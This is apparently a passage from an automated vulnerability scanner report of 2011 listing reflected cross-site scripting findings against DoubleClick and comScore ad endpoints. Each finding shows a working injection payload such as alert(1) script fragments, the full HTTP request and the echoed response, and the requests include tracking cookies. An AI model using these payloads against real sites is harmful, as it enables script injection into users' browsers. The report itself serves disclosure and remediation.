b30/7/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=a9297"-alert(1)-"8496255074bhttp://www.renu.com/coupons.html?utm_source=adrx&utm_medium=banner&utm_campaign=renu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscript
...[SNIP]...
4.10. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edfb9'-alert(1)-'02371f85c62 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=edfb9'-alert(1)-'02371f85c62 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5856
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:32:42 GMT
Expires: Fri, 24 Jun 2011 13:32:42 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
b30/7/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=edfb9'-alert(1)-'02371f85c62http://www.renu.com/coupons.html?utm_source=adrx&utm_medium=banner&utm_campaign=renu_2011\">
...[SNIP]...
4.11. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc1a"-alert(1)-"5e22fb0853e was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=69fc1a"-alert(1)-"5e22fb0853e&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:04 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=69fc1a"-alert(1)-"5e22fb0853e&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...
4.12. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57236'-alert(1)-'8e38fa4225c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=657236'-alert(1)-'8e38fa4225c&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:08 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=657236'-alert(1)-'8e38fa4225c&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...
4.13. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8156"-alert(1)-"c271489ca7 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017e8156"-alert(1)-"c271489ca7&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5906
Date: Fri, 24 Jun 2011 13:31:55 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7d/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017e8156"-alert(1)-"c271489ca7&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...
4.14. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce438'-alert(1)-'17c1f71f23 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017ce438'-alert(1)-'17c1f71f23&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5913
Date: Fri, 24 Jun 2011 13:31:59 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7d/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017ce438'-alert(1)-'17c1f71f23&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...
4.15. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0882'-alert(1)-'351f198fca4 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553b0882'-alert(1)-'351f198fca4&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:16 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553b0882'-alert(1)-'351f198fca4&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...
4.16. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aefe1"-alert(1)-"70048dfceb8 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553aefe1"-alert(1)-"70048dfceb8&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:12 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553aefe1"-alert(1)-"70048dfceb8&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...
4.17. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da161'-alert(1)-'636ccbb15bb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564da161'-alert(1)-'636ccbb15bb&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:31:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564da161'-alert(1)-'636ccbb15bb&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...
4.18. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38004"-alert(1)-"6e5cb2d63c0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=30656438004"-alert(1)-"6e5cb2d63c0&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:31:46 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=30656438004"-alert(1)-"6e5cb2d63c0&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFoun
...[SNIP]...
4.19. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bcde"-alert(1)-"e30639d2e6f was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=84bcde"-alert(1)-"e30639d2e6f&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:29 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=84bcde"-alert(1)-"e30639d2e6f&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...
4.20. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fc56'-alert(1)-'5155e46d14c was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=88fc56'-alert(1)-'5155e46d14c&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:33 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=88fc56'-alert(1)-'5155e46d14c&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...
4.21. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 3a324<script>alert(1)</script>ae0e732eb9f was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction3a324<script>alert(1)</script>ae0e732eb9f&n=ar_int_p97174789&1308922038899 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 